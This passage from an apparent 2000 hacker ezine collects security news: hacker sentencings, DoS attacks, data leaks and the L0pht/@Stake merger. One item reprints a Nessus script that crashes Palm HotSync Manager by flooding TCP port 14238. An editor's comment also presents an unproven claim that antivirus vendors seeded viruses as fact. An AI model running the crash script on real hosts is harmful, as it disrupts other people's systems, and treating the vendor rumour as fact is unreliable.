Department, Web posting appears to be permitted. Some cryptographers have already done just that. "I'm willing to give it a try," wrote cryptographer Wei Dai on an encryption mailing list. "I sent an email to BXA [Bureau of Export Administration] and got no reply. The rules do not say I need permission, just notification, so Crypto++ is now available for unrestricted download." Dai maintains the Crypto++ library of C++ encryption routines, including authentication programs and ciphers. Soon after, the text of the Electronic Frontier Foundation's Cracking DES book appeared online. http://www.shmoo.com/crypto/Cracking_DES @HWA 38.0 HNN: Jan 21: H4g1s Member Sentenced to Six Months ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by extension Jason Mewhiney, the Canadian who defaced a NASA web page back in 1997, has been sentenced to 6 months in prison and ordered to pay a $6000 fine. Mewhiney pleaded guilty to 12 of the 51 charges against him, including committing mischief to data stored and fraudulent use of a NASA computer system. NASA estimated the damages caused by the intrusion at $70,000. (And how much did it cost to prosecute the case?) Canadian Press - via Yahoo http://ca.dailynews.yahoo.com/ca/headlines/cpress/tc/story.html?s=v/ca/cpress/20000118/tc/technology_461022_1.html Monday January 17 11:48 PM ET Man sentenced to six months in jail after pleading guilty to computer hacking SUDBURY, Ont. (CP) - A man was sentenced to six months in jail and fined $6,000 Monday after pleading guilty to computer hacking related charges, including altering NASA's Web site. Jason Mewhiney, 22, went into the space agency's Web site March 5, 1997, leaving a message that called for an end to the commercialization of the Internet and freedom for two hackers in jail for computer crimes. Justice John Poupore compared Mewhiney's actions to that of a "safecracker" trying to steal money from a bank. "Mr. Mewhiney, you ought not to leave this courtroom with a badge of honour in the computer community," the judge said Monday. "You sir, are a convicted criminal. That is a distinction you will carry with you for the rest of your life. It is nothing to be proud of." Mewhiney, of Val Caron, outside of Sudbury, pleaded guilty to 12 of the 51 charges he was facing, including committing mischief to data stored and fraudulent use of a NASA computer system. He was able to access dozens of computer systems by using programs that crack password codes. The space agency's home page was put briefly out of service for repair, at an estimated cost of $70,000. NASA and FBI computer crime teams caught Mewhiney by tracing his movements. Mewhiney told the court he was sorry. "I'd just like to say I'm sorry and I'm sorry for everyone's time I've wasted," he said. RCMP searched his parent's home in the spring of 1998 and found a paper with numerous computer system passwords on them. The judge agreed to a request by assistant Crown attorney Patricia Moore that Mewhiney's computer and other papers seized by police be confiscated. One of his probation conditions was that he not possess a computer. (Sudbury Star) © The Canadian Press, 2000 @HWA 39.0 HNN: Jan 21: Smurf Attack Felt Across the Country ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Dark Knight A small ISP in Seattle WA, Oz.net, suffered a major Smurf attack last weekend that was felt across the country. The denial of service attack is estimated to have been launched from 2000 systems nationwide. 70% of the traffic in the Washington State area was said to have been effected. MSNBC http://www.msnbc.com/local/KING/483728.asp 404 my dr00gies, sorry article unavailable... @HWA 40.0 HNN: Jan 21: CIHost.com Leaves Customer Info On the Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench CIHost.com, a web hosting company based in Texas, left over 1500 customer records available on the internet for anyone with a web browser to read. CIHost said that the database had been moved to a server so an outside developer could have access to the information and by mistake password protection was omitted. The customer records included information such as name, credit card type, credit card number, and the amount charged. MSNBC http://www.msnbc.com/news/360102.asp (fuck MSSNBC and their bullshit page design) @HWA 41.0 HNN: Jan 21:False Bids Submitted, Hackers Blamed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench False bids on an online auction for a dinosaur skeleton have been blamed on 'hackers'. False bids of up to $15 million where submitted by people with names such as 'stevebert' and 'dumbass507'. The bidding procedure has been revamped to prevent this from occurring again however no details where given as to exactly what security measures where put in place. (It is amzing how many different definitions of the word 'hacker' exist) BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_608000/608634.stm Tuesday, 18 January, 2000, 17:52 GMT Hackers attack dinosaur auction Dinosaur hunters with their quarry: Alan Detrich (left) and Fred Nuss By BBC News Online's Damian Carrington An online auction for a complete Tyrannosaurus rex skeleton was attacked by malicious hackers on Tuesday who filed 17 false bids. At least six of these made it through security measures specifically put in place to prevent such action. "Some people found a way around that process and they have been removed," confirmed Brian Payea, public relations manager for Lycos. He told BBC News Online: "There are no valid bids so far." Bank chat The first attempt to auction the 11-metre fossil dinosaur on eBay was scuppered by prank bids of up to $8m. However, this time, the new auctioneers Lycos Auction had teamed up with the website millionaire.com to try to verify the wealth of bidders before they made their offer. Mr Payea described what should have happened: "You fill in a form, that is sent to millionaire.com and they review it and have a conversation with your bank. The approval is given and someone can bid." However, hackers named "mrmanson20", "stevebert" and "dumbass507" found a hole and posted bids of up to $15m, well over the reserve price of $5.8m. No credit compromise Mr Payea declined to give details of what happened: "How the whole process works is proprietary and I'm not going into detail about it. But we are very confident it couldn't be done again." He added that: "The hiccup does not compromise anybody's credit information - that is all encrypted and very secure." The auction opened on Monday but Mr Payea was not concerned that no verified bids had yet been received: "It takes at least 24 hours for the approval process to be completed. In any case, I think it will take people a little while to commit to that kind of purchase - if it was me, I'd be having a chat with an accountant or two before I bid." Million dollar bones Even the reserve price may appear high but in 1997 a T. rex was bought for $8.36m by the Field Museum in Chicago, US. The deal on this skeleton does include delivery from its current home in a Kansas warehouse. However, the bones are only partly exposed from the rock blocks in which they were found. The 65 million-year-old fossil was discovered on a South Dakota cattle ranch in 1992. Owner Alan Detrich says he sees nothing wrong with auctioning off a piece of the Earth's history. After all, he said, he spent more than $250,000 of his own money unearthing the dinosaur. And he will give 10% of the proceeds to the owners of the cattle ranch where the rock-encased skeleton was found, he says. "This auction is open to the world. If we don't have the right to (sell the fossil), then we don't live in America. If we didn't go there and get him, he'd still be up there." Mr Detrich added that he does not mind if his T. rex becomes a corporate mascot or is sold to a private collector with no intention of displaying it publicly. Chuck Schaff, at the Museum of Comparative Zoology at Harvard University, said the fossil would be ideal for drawing crowds to a museum, but was probably too expensive for most. "It's not unethical to sell it, it's just a shame it goes to the highest bidder," Mr Schaff says. "Some specimens do get away from scientists, but that's life. It's sad, though." The auction, which began on Monday, is due to close at 0100 GMT on 11 February 2000. @HWA 42.0 HNN: Jan 21: UK to create cyber force ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by deepquest The UK National Criminal Intelligence Service (NCIS) has been assigned Ł337,000 to draw up plans for establishing a cyber crime squad. This online cyber force will be used to combat online fraud, money laundering, distributing pornography and information about pedophilia, and electronic intrusions. The Guardian Unlimited http://www.newsunlimited.co.uk/uk_news/story/0,3604,123365,00.html 'Cyberforce' to fight online crime Monday January 17, 2000 A national "cyberforce" of computer specialists is to be established by the home office to police the internet and combat a rising tide of online crime. It was confirmed last night that the home secretary, Jack Straw, has assigned Ł337,000 to the UK National Criminal Intelligence Service (NCIS) to draw up plans for establishing a squad to counter criminal activity on the web. The move, which will target those using computers for fraud, money laundering, distributing pornography and information about paedophilia, and hacking, follows a three-year NCIS study of internet crime which concluded that illegal activity on the web, from email viruses to cyber-stalking, is increasing as the wired population grows. Operation Trawler highlighted the inadequacies of anti-computer crime units, leading to calls for a dedicated organisation. The new unit is expected to include experts in the private sector, the Inland Revenue and police. It will also draw on resources available through links with MI5 and GCHQ - the government agency that eavesdrops on Britain and the world's communications networks. Roger Gaspar, the director of intelligence at NCIS, and David Phillips, the chief constable of Kent and head of the crime committee at the Association of Chief Police Officers are drawing up plans for the unit, which will also make use of links with American intelligence organisations and the FBI. Barry McIntyre @HWA 43.0 HNN: Jan 21: Army Holds Off Cyber Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench System Administrators at Redstone Arsenal in Alabama are proud that they withstood the Y2K onslaught of cyber intruders. However, they go on to admit that in the past three months Redstone has been hit with 17 denial of service attacks of which twelve succeeded, and that they have had three web sites breached in the last year. (The interesting part of this article is at the end where the administrator admits that his network has a single point of failure.) Government Executive Magazine http://www.govexec.com/dailyfed/0100/012100j1.htm January 21, 2000 DAILY BRIEFING Army outpost held off hackers in New Year's showdown By Joshua Dean jdean@govexec.com Shortly after dark on New Year's Day, the pager on the belt of Steve Carey, chief of information assurance at the Army's Redstone Arsenal in Alabama, went off. The message was alarming: a hacker was trying to crack into a critical server that keeps track of network identities and passwords at the arsenal. When Carey got to the arsenal's network management center, he found the system protections had withstood the attack and all was well. But Carey and his staff couldn't rest. Attackers continued trying to breach the arsenal's computers and its Web sites as the new millennium dawned. Some other government sites were spared attacks during the New Year's holiday, even though they had braced for the worst. But Redstone is a particularly attractive target for high-tech bandits. The arsenal has technical information on 14 of the Army's top 29 weapons systems, including missiles, helicopters and conventional aircraft. It also handles about 63 percent of the Army's foreign military sales. This means transfers of money as well as weapons technology. "It's big bucks," said Col. Douglas S. Brouillette, who heads the arsenal's Intelligence and Security Directorate. As a result, security experts in Redstone's Local Computer Incident Response Team (LCIRT) are constantly vigilant and in many ways ahead of other agencies when it comes to handling network attacks. LCIRT uses a number of computer intrusion detection systems. But even places such as Redstone, where computer security is a high priority, can't get all the technology resources they need. So instead of relying entirely on technology, the arsenal depends on people to remain alert against attacks. "We have a high level of monitoring because we don't have all the firewalls we need installed yet. We hope the monitoring compensates for that," Brouillette said. "Monitoring allows us to detect, immediately react and fix attacks until we get all the firewalls and other security products installed." Redstone's basic defense is to find attacks quickly in order to stop them as they happen, he said. Contract analysts from Intergraph Federal Systems serve with Carey on his defense team. Redstone needs all the help it can get, because its networks are peppered with attacks daily. "We've had hundreds of incidents in the last three-month period," Brouillette said. "That's 3,000 to 4,000 scans of the network." Hackers conduct scans to try to find out what hardware and software are present on a given network. Scans can discover computers or even modems with open links to the Internet. Unknown hackers who appeared to be from countries including Bulgaria, China, Hungary, Israel, Latvia, Lithuania, Macedonia, Poland, Portugal, Romania and Russia have scanned Redstone over the past three months. But because hackers can make it look as if they were on a computer in a different country, pinning them down geographically is an imperfect science. Once the reconnoitering is complete, hackers try to exploit vulnerabilities and gain access to private networks and the information stored there. Without intrusion detection systems and expertise, network staff may never know they've been hacked. Beyond scanning and attempted break-in, hackers can cripple networks and servers by launching "denial-of-service" attacks. In such incidents, intruders launch a flood of messages to a single server, overwhelming it. Denial of service attacks have become so commonplace that they come with colorful names, such as Ping Flood, SMURF, SYN Flood, UDP Bomb and WinNuke. Over the past three months Redstone has been hit with 17 denial of service attacks. Twelve of them succeeded. And then there are the vandals—Internet gang members armed with digital spray paint—that LCIRT must contend with. "Three of our Web sites have been breached in the past 12 months," Carey said. In the successful attacks, the methods were new to the network defenders, which meant the attackers were able to change the Web sites. Once LCIRT members discovered how the hackers pulled off the attacks, they went through every base Web server to make sure vulnerabilities were fixed. Because of past vigilance, the New Year's vandals failed to make a dent. LCIRT members say new attacks and techniques are constantly appearing, and the only way to stop them is to have a team monitoring the network and the logs of the intrusion detection systems. That's how the arsenal's defenders knew the New Year's hackers were aiming deliberately for one of Redstone's most sensitive servers. "If you get into that server you can go anywhere in the installation," Brouillette said, breathing a sigh of relief now that 2000 is well under way and his servers are intact @HWA 44.0 HHN: Jan 24: French smart card expert goes to trial ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by sian An expert in smart card technology has been arrested and faces up to seven years in jail, and a fine of Ł500,000 after he designed a fake smart card that could be used to defraud 'any cash terminal'. Serge Humpich then offered the spoofed card to French banks in exchange for Ł20 million. The banks accused him of blackmail. The UK Register http://www.theregister.co.uk/000123-000005.html (using some sucky html that fucks up c&p) @HWA 45.0 HNN: Jan 24: Palm HotSync Manager is Vulnerable to DoS Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by kingpin We don't usually cover individual security vulnerabilities here at HNN but this one is interesting. The Palm HotSync Manager is vulnerable to DoS attack which may also crash the system and possibly allow the execution of arbitrary code. Anyone who runs HotSync Manager over the network is a potential target of attack. Beyond-Security's SecuriTeam http://www.securiteam.com/exploits/Palm_HotSync_Manager_is_vulnerable_to_Denial_of_Service_attack.html Title Palm HotSync Manager is vulnerable to Denial of Service attack Summary HotSync Manager provides network synchronization between the Palm Desktop and a remote Palm PDA that is connected via the Internet. This feature is used to backup the information from the Palm PDA to a secure location. However, using HotSync Manager over the network exposes it to an attack, where anyone with network connection to the station running HotSync Manager can crash the application and possibly execute arbitrary code. Details Vulnerable systems: HotSync Manager 3.0.4 under Windows 98 Non vulnerable systems: HotSync Manager 3.0.4 under Windows 2000 Exploit: By connecting to the HotSync Manager's TCP listening port (TCP port 14238), and sending a large amount of data followed by a newline, it is possible to crash the HotSync Manager. The following Nessus Plugin can be used to test this: # # This script was written by Noam Rathaus # # See the Nessus Scripts License for details # # if(description) { name["english"] = "HotSync Manager Denial of Service attack"; script_name(english:name["english"]); desc["english"] = "It is possible to cause HotSync Manager to crash by sending a few bytes of garbage into its listening port TCP 14238. Solution: Block those ports from outside communication Risk factor : Low"; script_description(english:desc["english"]); summary["english"] = "HotSync Manager Denial of Service attack"; script_summary(english:summary["english"]); script_category(ACT_DENIAL); script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam"); family["english"] = "Windows"; script_family(english:family["english"]); exit(0); } # # The script code starts here # if (get_port_state(14238)) { sock14238 = open_sock_tcp(14238); if (sock14238) { data_raw = crap(4096) + string("\n"); send(socket:sock14238, data:data_raw); close(sock14238); sleep(5); sock14238_sec = open_sock_tcp(14238); if (sock14238_sec) { security_warning(port:14238, data:"HotSync Manager port is open."); } else { security_hole(port:14238); } } } Additional information 3Com's Palm computing team is aware of the problem and will fix this issue in the next release of the HotSync Manager. @HWA 46.0 HNN: Jan 24: Viruses Cost the World $12.1 Billion ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HWA Comment: I'll say this as a RUMOUR or MYTH in order to avoid possible libel charges but it was a well known fact that certain (very well known and established) Anti-Virus vendor(s) ran underground BBS's (dial up bulletin boards) in the 80's and later special backdoored FTP sites in the 90's for the purpose of virus authors to upload new viruses to be deployed into the wild so that the AV companies could capitalize on these new 'threats'....so when I read about costs like this I really wonder how much was premeditated by the AV companies themselves in order to make a buck from susceptible companies and people that refused to practice safe computing....trust noone, except maybe AVP. You can debate this if you like but I know it is fact, I was there and had access to these sites. - (HWA Trusted source) From HNN http://www.hackernews.com/ contributed by nvirb According to a recent study conducted by Computer Economics, a California based computer consulting firm, the world spent $12.1 billion last year in a war against malicious self replicating code. The $12.1 Billion figure is based on lost productivity, network downtime and the expense involved in getting rid of the virus. (Hmmmm, that number seems ridiculously large.) APB News http://www.apbnews.com/newscenter/internetcrime/2000/01/20/virus0120_01.html Computer Viruses Cost $12 Billion in 1999 Report Tallies Business Impact of 'Economic Terrorism' Jan. 20, 2000 By David Noack CARLSBAD, Calif. (APBnews.com) -- Businesses around the world spent $12.1 billion last year in a war against "economic terrorism" in the form of malicious computer viruses, according to a new study. Computer Economics, a computer consulting firm here, has found that the economic impact of virus attacks on information systems around the world are taking a heavy financial toll on business. For the most part, computer security concerns have focused on hackers trying to gain entry into a company's computer system, rifling through files and possibly stealing sensitive and confidential information. But viruses, especially those delivered in e-mail, are giving corporate information technology managers something new to worry about. Lost productivity and downtime Samir Bhavnani, the analyst with Computer Economics who conducted the study, said the $12.1 billion is based on lost productivity, network downtime and the expense involved in getting rid of the virus. "This form of economic terrorism is growing as viruses are no longer the minor annoyances that they were a few years ago," Bhavnani said. "Now they can verge on the catastrophic and cause major predicaments for any organization." He said for the first six months of last year, financial losses caused by computer viruses totaled $7.6 billion. Bhavnani said that companies must devote time to teaching their employees "prudent workstation use." Delivery began to change "Simple things like refraining from downloading unnecessary and non-work-related items from the Internet, opening executable files sent via e-mail or frequenting pornographic Web sites will increase the security level and reduce the vulnerability of valuable corporate resources," Bhavnani said. A survey conducted last year by Information Security magazine asked information technology managers where they experienced the most security breaches. Seventy-seven percent said computer viruses were the No. 1 problem, followed by unauthorized access by employees and hackers and the theft and destruction of computing resources. Last year, a series of malicious viruses clogged e-mail networks, crashed computers and erased hard drives. The way that viruses are delivered began to change. The "Bubbleboy" virus was activated when unsuspecting users opened an infected e-mail. In the past, computer viruses were spread through attachments, and e-mail was generally regarded as safe. 'High-profile damage' With computer virus alerts coming sometimes on a daily basis, security experts say that businesses are still not taking virus prevention seriously. "Despite all of the high-profile damage caused by viruses, organizations are still just beginning to implement adequate security plans," said Michael Erbschloe, vice president of research at Computer Economics. "Additionally, many firms are reluctant to report damages because they feel they may be identified as an easy target." The study says that in the past three years there has been a major programming shift as viruses have become far more malicious and are designed specifically for destruction and damage. The study said that computer viruses were initially designed to create a minor annoyance. Now they are very complex and come in a multitude of forms, and many are polymorphic, which means they change while in a computer to avoid detection from anti-virus software. Melissa and Explorer encouraged copycats "The Melissa and Explorer.zip viruses acted as a catalyst in 1999," said Erbschloe. "Organizations started to realize the severity and the malicious intent of most new computer viruses and began to take the cries for increased security spending more seriously." Steven Ross, a director at Deloitte & Touche's Enterprise Risk Services Practices, said computer viruses are having a noticeable impact on companies. "The first wave of viruses 10 years ago attacked at the operating system level. The ones we see today are attacking at the application level. The filters that come into play when you boot up aren't necessarily capturing the things that are happening at the application level," said Ross. He said there may only be a handful of smart computer writers, and that there are hundreds and thousands so-called script kiddies who when taught to program a virus can do so without much effort. Writers rely on 'general complacency' "There is also a general complacency. ... They are absolutely counting on it," said Ross. He cited an example of removing 7,500 viruses from a number of servers for a company. When he returned the next week, there were 1,500 more viruses. Dan Schrader, vice president of new technology at Trend Micro, an anti-virus software company in Silicon Valley, said the $12.1 billion figure is "conceivable," and "I am not at all surprised by that number." "If you want to label what the year [1999] was in technology, the first label would be the year of the IPO, and the second label would be the year of the computer virus. There were more serious computer virus outbreaks in any one month of last year than we've had virtually in the entire history of computing," said Schrader. He said there was "tremendous innovation" among computer virus writers, and for the first time the virus writers got it that it's "all about the Internet." "There is lost data, lost productivity while you wait for the tech guy to come around, and then there's the e-mail systems being shut down," Schrader said. "One of the more common ways for companies to respond to news of a new virus outbreak is to do a pre-emptive shutdown of their e-mail system. ... It's the main way that computer viruses are spread." David Noack is an APBnews.com staff writer (david.noack@apbnews.com) @HWA 47.0 HNN: Jan 24: L0pht and @Stake Create Controversy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Someone gets a grant or has a merger with a commercial company and suddenly they have "SOLD OUT" become "NARQS" or the like, pure BS The l0pht is long overdue its break in the security field, so just chill and let them do their thang, you're just jealous you ain't got what it takes to make the grade yourself. - Ed From HNN http://www.hackernews.com/ contributed by Weld Pond The recent merger of the hacker think tank L0pht Heavy Industries with security services company @Stake has created an immense buzz within the industry. Unfortunately some journalists (well one actually) don't seem to get it and have published some potentially libelous comments regarding the merger. ZD Net http://www.zdnet.com/pcweek/stories/news/0,4153,2420340,00.html Other writers seem to have more legitimate concerns but it still obvious that they have not done their research. ZD Net http://www.zdnet.com/pcweek/stories/columns/0,4351,2421254,00.html And still others actually seem to understand. Boston Herald http://www.bostonherald.com/bostonherald/life/net01182000.htm CNN http://cnn.com/TRANSCRIPTS/0001/22/stc.00.html ABC News http://abcnews.go.com/onair/dailynews/wkn_000122_netsecurity.html ZDNet #1; -------------------------------------------------------------- This story was printed from PC Week, located at http://www.zdnet.com/pcweek. -------------------------------------------------------------- It gets really scary when hackers join security firms By John Taschek, PC Week January 16, 2000 9:00 PM PT URL: It's shaping up to be an interesting year, which in some cultures is not necessarily a good thing. First, Lotus President Jeff Papows resigns, though I'm not sure I believe anything from Papows anymore. Then Steve Jobs takes full control over at Apple, which will, of course, trigger a huge sell-off at Apple because, as everyone knows, Jobs works best when he's a front-seat driver with a back-seat title. Then China reportedly bans Windows 2000, presumably so that the country could develop an indigenous operating system based on Linux. (The Chinese government denied the report.) But by far the oddest thing to happen is that the hackers (or, as the fundamentalist technologists say, crackers) who went by the name L0pht Heavy Industries have now become full-scale security consultants. Does this bode ill for the nation's security, or what? Is everyone off their rocker? I can't believe what I'm reading. I also can't believe I'm writing about it, since dealing with people who have exhibited criminal tendencies is not a business I want to be in. L0pht was a highly publicized group of hackers who started out cracking security systems and then, somewhere along the line, became somewhat legitimate because they began to document what they were doing on the L0pht.com Web site. L0pht also develops software that allows users to crack operating system passwords in a matter of hours. To get an idea how strange it is for a security firm to hire L0pht personnel, you only need to look at the Attrition.org Web site, which highlights L0pht. Attrition's motto is, "We're easy to get along with once you learn to worship us." More damning is that L0pht has also gone on record as saying that "governments and multinational corporations are detrimental to the personal liberties on the Internet." On the other hand, L0pht's new company, called @Stake, is a specialized professional services company that will provide a full range of security solutions for the e-commerce operations of global clients. This is clearly an example of the farmer giving the fox the key to the chicken coop. I can't imagine that any legitimate startup would actually seek out L0pht. But that's exactly what has happened, as executives from Forrester Research, Cambridge Technology Partners and Compaq formed @Stake specifically to provide security services to its clients. Lo and behold, the vice president of R&D at @Stake is none other than Professor Mudge, the chief scientist at L0pht. I can just imagine Mudge hacking and cracking to his heart's content, simply to find weaknesses at those multinational companies, which then would become @Stake's new customers. Of course, the tired old argument is that L0pht performs a service by detailing flaws in systems so that companies can boost their defenses against a real, and more threatening, hacker. Hogwash, poppycock and every other early-20th-century declarative. L0pht comprised many extremely bright and talented people, and Mudge might have been the smartest of the bunch. But L0pht's history shows that the group is not ethical, maintained practices that bordered on being illegal and is simply downright scary. I wouldn't want any organization that hired the brain trust of L0pht as my security consultant. See @Stake's response to John Taschek's column. Is it better to join them if you can't beat them? Write me at john_taschek@zd.com. I encourage you to DO write him and respond to this article but do so politely, expletives and leet talk will just make us look worse and prove his point. - Ed -=- ZDNet #2 -------------------------------------------------------------- This story was printed from PC Week, located at http://www.zdnet.com/pcweek. -------------------------------------------------------------- L0pht-@Stake pact: Going legit, selling out or both? By Michael Caton, PC Week January 16, 2000 9:00 PM PT URL: http://www.zdnet.com/pcweek/stories/columns/0,4351,2421254,00.html What bothers me the most about security specialist L0pht Heavy Industries becoming part of @Stake isn't the idea of hiring hackers. It's the idea that L0pht's great, free public service is now very much for hire. The trend in the industry has been to give away, or at least subsidize with advertising, some beneficial IT resources. I can think of at least a half-dozen free IT help sites that eventually hope to make money through advertising or e-commerce. Access to security information is moving in the other direction, however, entirely because there is so much demand and so few security experts. L0pht has been a thorn in the side of many vendors; a quick look at its Web page, reveals a great tweak of Microsoft. L0pht has been known to really embarrass vendors that have not moved quickly enough to address the security holes the group finds. Access to most of the information has been free—or, according to the L0pht site, "so that system administrators, users, and software and hardware vendors may benefit from our knowledge, we share some of it with you." In the past, "some" could have meant that L0pht held information back to protect us all from the less scrupulous, but now it could be held back to help @Stake maintain a competitive advantage when consulting. Talk about unscrupulous. What will be as interesting will be to see how this security-for-hire model plays out when it comes to companies such as @Stake maintaining a competitive advantage. By going fully legit and for-profit, this could compromise relationships with hacking sources. When a security expert or hacker finds a new exploit, is the rush going to be to share it with anyone? Not if someone else is going to make money off it or hold it as confidential information to have a competitive advantage. Perhaps image and rhetoric can maintain enough good will to keep sources alive, although I'm not so sure an anarchist's mantra will convince too many people when a company's analysts bill out in the tens of thousands of dollars per week. In an industry where the nondisclosure agreement is as important as the business contract, I wonder just how well the hacking community will disclose security holes it finds when under contract to vendors. Let's face it: IT consulting companies aren't the only ones hiring hackers. Security skills can be as useful for product development as for product deployment. Hopefully, as @Stake contracts out to vendors, it has an escape clause that allows it to disclose security flaws after a certain number of business days, just to keep the vendors honest. While it is possible that L0pht will survive in spirit, the @Stake Web site, has all the polish of the best up-and-coming dot-com company looking to strike gold. Retaining the anti-establishment spirit would certainly keep it in the good graces of its sources. Do you think good security info will be held hostage to profits in the future? Write me at michael_caton@zd.com. -=- Boston Herald; Cutting to the chase: Hackers join forces with security firm to keep the world safe Net Life/Stephanie Schorow Tuesday, January 18, 2000 Which is a more revealing story? That in December a hacker calling himself Maxim broke into a server at an on-line CD store and obtained thousands of credit card numbers? Or that when Maxim posted those numbers on a Web site from which visitors could get them, one at a time, thousands reportedly did so? Must we beware the hacker in the machine - or the hacker next door? First, a look at the word ``hacker'' - it's not a synonym for ``criminal,'' just as not every locksmith is a burglar, as one hacker told me. A hacker cracks software codes to get into a company's network or Web page for the thrill of beating the system, not necessarily to cause mischief. But the movie ``War Games'' transformed a bit of MIT slang for a guy who likes to create computers into a term for someone who wants to destroy them. In popular culture, the Evil Genius Hacker has joined the Mad Scientist and Meglomaniac Who Wants to Rule the World as a standard stereotype. Fox Mulder of TV's ``The X-Files'' could not chase his aliens without illegal hacking help from the so-ugly-they're-cute Lone Gunmen, Good Guy Hackers. Hackers get a total makeover into leather-coated chic in ``The Matrix.'' But such stereotypes don't hold up in real life. The most recent Def Con - the hackers' annual meet-and-defeat confab, had, according to one on-line report, ``all the corporate professionalism of a computer mainstream industry.'' Activists, calling themselves ``white hat hackers,'' have formed a group dedicated to hacking into and shutting down kiddie-porn sites. And just two weeks ago, the famed Boston-area hacker collective - known as the LOpht - announced its merger with a start-up security company, @Stake. With founders hailing from Compaq and Forrester Research, plus $10 million in venture capital, @Stake is pure pinstripe. At LOpht, geek rules. The news intrigued me. For years, I'd heard about LOpht's expertise, its Web postings of key security flaws in Windows-based systems, about its outlaws-in-good-standing image with the so-called black hat hacker underground, and about their gizmo- and Cheez-Its-clogged warehouse. Going by hacker handles of Mudge, Dildog and Space Rogue, they've testified on lax computer security before the U.S. Senate. They embodied Bob Dylan's phrase: ``to live outside the law, you must be honest.'' When the hacker who goes only by ``Mudge'' returned my call, his voice was more lighthearted than mysterious. For a guy who supposedly has the ability to take down the Internet in 30 minutes, he was cheerfully patient with a fumbling reporter's Hacking 101 questions. What enticed LOpht to come in from the cold? Well, money, for one thing; ``we'd been looking around for various way to get the LOpht to fund itself,'' said Mudge. With @Stake's pledge not to market any specific security product, take kickbacks from vendors or interfere with LOpht's continued posting of security flaws, LOpht will be able to remain the hacker's Consumer Reports, Mudge said. LOpht's independence is invaluable to @Stake, said Ted Julian, @Stake founder and vice president of marketing: ``There's an enormous demand in the marketplace for these people.'' That's because computer security itself is transforming. As Mudge said, ``We know how to make a closed system.'' Put up a fire wall and keep people out. But with burgeoning e-commerce, systems have to remain open enough to allow consumers access to key information. Users, for example, might want to search inventories or track a delivery. Yes, Mudge asserted, ``you absolutely can'' secure such systems. You just need the right tools. Attorney General Janet Reno's recent call for a national anti-cybercrime network underscores the need for enhanced security. Hacking is changing, too. Once the domain of code-writing uber-nerds, it's been invaded by so-called script kiddies, young neophytes who attack with a point and click. ``The media actually encourages them,'' Mudge said, disgustedly. ``If you read about someone breaking into a high profile Web page, it's `a 16-year-old, brilliant misguided kid.' If a 16-year-old walked into a liquor store, shot the clerk to get the money, they never say, a `brilliant juvenile expert in spontaneous combustion.' '' For me, the most telling aspect of the Maxim hack was that afterwards no one I knew - even those who blew big bucks shopping the dotcoms - seemed spooked about e-shopping. Perhaps we've accepted a certain level of e-commerce risk. Consider: thousands of traffic accidents occur daily, but we wouldn't ban driving. We just want to keep the 16-year-old drivers under control. And we want safer roads. Which makes me glad that the LOpht is still out there. -=- CNN; Science and Technology Week Pentagon Goes Ballistic With New Defense Tests; Group of Hackers Goes Corporate; Winds of Change Stir Up New Developments in Weather Aired January 22, 2000 - 1:30 p.m. ET THIS IS A RUSH TRANSCRIPT. THIS COPY MAY NOT BE IN ITS FINAL FORM AND MAY BE UPDATED. RICK LOCKRIDGE, GUEST HOST: The Pentagon goes ballistic with new defense tests, a secretive group of computer hackers goes corporate, and the winds of change stir up new developments in weather. Those stories and more are just ahead on SCIENCE & TECHNOLOGY WEEK. Hello and welcome. I'm Rick Lockridge in for Ann Kellan. A test of a new high-tech U.S. defense system ended in failure this past week. A prototype Interceptor, designed to knock out approaching missiles, apparently sailed right past its target. Pentagon experts think they've figured out what went wrong. But as Jamie McIntyre reports, the failure is raising questions about the whole program. (BEGIN VIDEOTAPE) JAMIE MCINTYRE, CNN MILITARY AFFAIRS CORRESPONDENT (voice-over): From the launch of a target missile at night in California through the launch of an Interceptor from a sunny Pacific island, Pentagon rocket scientists thought they were looking at a slam dunk. Everything was tracking perfectly. But as they counted down to an expected mid-space collision, nothing, no flash: nothing but black space. They missed. In reconstructing the failure, Pentagon officials say they believe heat sensors the Interceptor uses to find the warm warhead failed in the crucial final six seconds. Why they don't yet know. It was a bitter disappointment after October's successful maiden test, but the Clinton administration vowed to press on, insisting some misses were inevitable. JOE LOCKHART, WHITE HOUSE PRESS SECRETARY: Obviously, if this were easy technology, they wouldn't have to test. They'd just go ahead and deploy. MCINTYRE: The $100 million test was the second of 19 planned tests of a system designed to protect the United States from a limited missile attack by a rogue nation. But only one more test is planned in the spring before the Pentagon recommends whether to invest billions more for deployment of the system by 2005. Critics insist the failure is a wake-up call that the complex missile shield is not ready for primetime. TOM COLLINA, UNION OF CONCERNED SCIENTISTS: I would say it's just another piece of evidence that's showing that you can't make a decision this summer, that the system's moving too fast. MCINTYRE (on camera): The Pentagon, stung by criticism that it may have overstated its previous success, went to great lengths this time to explain exactly what went wrong. And while insisting it can solve the technical problems, a senior military official admitted the test schedule may be overly ambitious. Jamie McIntyre, CNN, the Pentagon. (END VIDEOTAPE) LOCKRIDGE: NASA made it official this week. The Mars Polar Lander is dead. The spacecraft was designed to study the Martian atmosphere and dig up soil samples. It was due to land on Mars on December 3. But just before it entered the Martian atmosphere, it stopped sending data back to Earth, and it hasn't been heard from since. One final attempt to contact it this past week met with silence. Scientists say the Polar Lander may have burned up as it descended, or it may have 